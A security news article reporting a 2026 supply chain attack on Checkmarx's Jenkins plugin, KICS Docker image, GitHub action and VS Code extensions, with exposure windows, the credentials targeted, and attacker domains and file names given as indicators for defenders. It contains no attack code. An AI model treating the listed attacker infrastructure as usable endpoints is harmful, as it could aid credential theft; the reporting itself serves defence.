TeamPCP Compromises Checkmarx Jenkins Compromised Plugin

A supply chain attack, which began with a relatively obscure open-source scanner, has now impacted one of the industry’s most widely used application security tools. In May 2026, a malicious version of the Checkmarx Jenkins AST plugin was quietly published to the Jenkins Marketplace. This action exposed development pipelines to potential credential theft and unauthorized access, as detailed in a

The incident traces back to a threat actor known as TeamPCP, whose earlier attack on the Trivy scanner set off a chain reaction with far wider consequences than many initially expected.

The attack did not happen in a single moment. It unfolded over weeks, beginning on March 23, 2026, when attackers first pushed malicious code directly into Checkmarx’s GitHub repository. That initial breach was linked to the TeamPCP supply chain compromise of the Trivy scanner, which the security community had flagged on March 19 as a potential tool for harvesting credentials from downstream users and their connected systems.

Analysts at Checkmarx traced the likely attack path back to the earlier Trivy incident, noting that the credentials obtained from that campaign were probably what allowed attackers to gain unauthorized access to the GitHub environment.

Once inside, the attackers interacted with internal repositories and pushed malicious code into key artifacts that are distributed to developers around the world.

The Jenkins Plugin Compromise

What followed was a multi-stage campaign with a growing blast radius. On April 22, 2026, a second wave of malicious artifacts was published, signaling that the attackers had maintained or regained access even after initial containment efforts. A cybercriminal group later identified as LAPSUS$ then published data stolen from Checkmarx’s GitHub repositories to the dark web on April 25, nearly a month after the suspected data exfiltration on March 30.

The full scope became clearer in May when a tampered version of the Jenkins AST plugin was uploaded to the Jenkins Marketplace under version 2026.5.09, giving the campaign a fresh and dangerous foothold across CI/CD pipelines worldwide.

The Jenkins plugin attack marked a significant escalation in an already serious incident. The malicious version, labeled 2026.5.09, was built to behave exactly like a legitimate tool, making it extremely difficult for development teams to detect the threat during routine pipeline runs. The window of exposure ran from May 9, 2026 at 01:25 UTC to May 10, 2026 at 08:47 UTC.

Any organization that pulled the plugin during that window and used it in an active build pipeline may have been exposed. Checkmarx confirmed that the last known safe version was 2.0.13-829.vc72453fa_1c16, published in December 2025. Teams running that version or any earlier release are not considered affected by this particular wave of the attack.

Checkmarx moved quickly to remove the malicious plugin and is working to publish a verified clean replacement. Organizations that rely on automated plugin updates are especially at risk, since the malicious version could have been pulled in silently without any visible change to the build configuration.

KICS and the Broader Artifact Exposure

The April wave hit a wider range of developer tools simultaneously. The public KICS Docker image on DockerHub was compromised between April 22, 2026 at 12:31 UTC and 12:59 UTC, while the ast-github-action was tampered with between 14:17 and 15:41 UTC the same day. The VS Code extensions for Checkmarx AST results and Developer Assist were also replaced with malicious versions across both the Microsoft and Open VSX marketplaces.

Based on the investigation, the primary purpose of the malicious code was the collection and attempted exfiltration of credentials and secrets from affected environments. Targeted data included GitHub personal access tokens, cloud credentials for AWS, Azure, and Google Cloud, Kubernetes service account tokens, SSH keys, and Docker registry credentials.

Checkmarx has recommended that organizations immediately block outbound access to checkmarx.cx and audit.checkmarx.cx. Teams should also rotate all potentially exposed credentials, pin tools to verified SHA hashes, disable auto-update settings on IDE extensions, and review CI/CD logs for any references to tpcp.tar.gz, checkmarx.zone, or unexpected repositories such as tpcp-docs.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.